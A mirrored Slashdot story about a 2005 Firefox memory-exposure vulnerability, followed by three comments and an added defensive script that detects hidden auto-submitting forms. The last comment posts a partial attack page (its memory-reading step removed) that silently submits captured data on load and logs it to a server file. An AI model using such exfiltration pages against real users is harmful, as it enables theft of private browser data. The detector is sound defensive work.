Slashdot Mirror


Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

3 of 132 comments

  1. Re:Confusing write-up by cjsnell · Score: 5, Informative

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

    Yes, this is very dangerous.

  2. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · Score: 5, Informative

    From the bugzilla bug report (copy it, they disallow /. links):

    Opened: 2005-04-01 13:40 PDT
    Last modified: 2005-04-01 22:39 PDT
    Resolution: FIXED

    So yes they did, it was fixed in under 10 hours, and published 3 days later.

  3. Ok, confirmed by cjsnell · Score: 4, Informative
    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    // First piece of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print OUTFILE $result;
    close(OUTFILE);
    </%init>
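
A defender-side counterpart to the page posted in the last comment, as an added example that is not part of the thread: a heuristic check that flags inline forms made only of hidden fields which script fills and submits without user action. The function name, result fields and both sample pages are constructed for illustration.

```javascript
// Added example: heuristic triage for pages that silently POST hidden
// fields filled by script. Regex-based, so it only sees inline markup.
function findAutoSubmitForms(html) {
  // All inline script text, concatenated.
  const scripts = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)]
    .map((m) => m[1])
    .join("\n");
  // A load-time trigger on <body> means no user action is needed.
  const onLoad = /<body\b[^>]*\bonload\s*=/i.test(html);
  const findings = [];
  for (const [, attrs, body] of html.matchAll(/<form\b([^>]*)>([\s\S]*?)<\/form>/gi)) {
    const name = (attrs.match(/\bname\s*=\s*["']?(\w+)/i) || [])[1];
    if (!name) continue; // unnamed forms are out of scope for this check
    const inputs = [...body.matchAll(/<input\b[^>]*>/gi)].map((m) => m[0]);
    const allHidden =
      inputs.length > 0 &&
      inputs.every((tag) => /\btype\s*=\s*["']?hidden\b/i.test(tag));
    // document.<name>.submit( or document.forms.<name>.submit(
    const submits = new RegExp(
      `document\\.(?:forms\\.)?${name}\\.submit\\s*\\(`
    ).test(scripts);
    // document.<name>.<field>.value = ...  (field populated by script)
    const scriptFilled = new RegExp(
      `document\\.(?:forms\\.)?${name}\\.\\w+\\.value\\s*=[^=]`
    ).test(scripts);
    if (allHidden && submits) findings.push({ form: name, scriptFilled, onLoad });
  }
  return findings;
}

// Constructed sample pages (not taken from the thread).
const SUSPECT = `<body onLoad="send();"><script>
function send() { document.f1.result.value = collect(); document.f1.submit(); }
</script><form method=POST name='f1'><input name=result type=HIDDEN value=''></form></body>`;
const BENIGN = `<body><form method="post" name="login">
<input type="text" name="user"><input type="hidden" name="csrf" value="x">
<input type="submit"></form></body>`;

console.log(findAutoSubmitForms(SUSPECT)); // one finding for form f1
console.log(findAutoSubmitForms(BENIGN));  // no findings
```

A finding with both `scriptFilled` and `onLoad` set is the strongest signal; forms built or submitted from external scripts are not seen by this check.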